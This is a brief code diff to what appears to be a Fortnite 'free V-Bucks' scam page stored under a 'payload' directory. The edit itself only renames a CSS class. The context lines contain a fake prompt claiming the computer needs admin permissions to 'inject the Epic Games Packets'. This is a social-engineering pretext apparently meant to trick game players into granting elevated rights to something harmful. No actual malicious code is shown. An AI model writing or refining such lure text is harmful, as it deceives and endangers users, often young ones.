--- a/payload/vbucks/src/index.html
+++ b/payload/vbucks/src/index.html
@@ -129,7 +129,7 @@
                                     </div>
                                 </div>
                                 
-                                <div class="wrap-wrap" style="display:none;" id="confirm">
+                                <div class="wrap-wrap-clone" style="display:none;" id="confirm">
                                     <div class="col-sm-9 col-xs-9 center-block input-wrap text-center">
                                         <h4 style="font-family: fortnite; font-size: 20px; text-transform: uppercase;">Your computer might need admin permissions to inject the Epic Games Packets successfully. Do you want to continue?</h4>
                                         <div id="menu-outer">
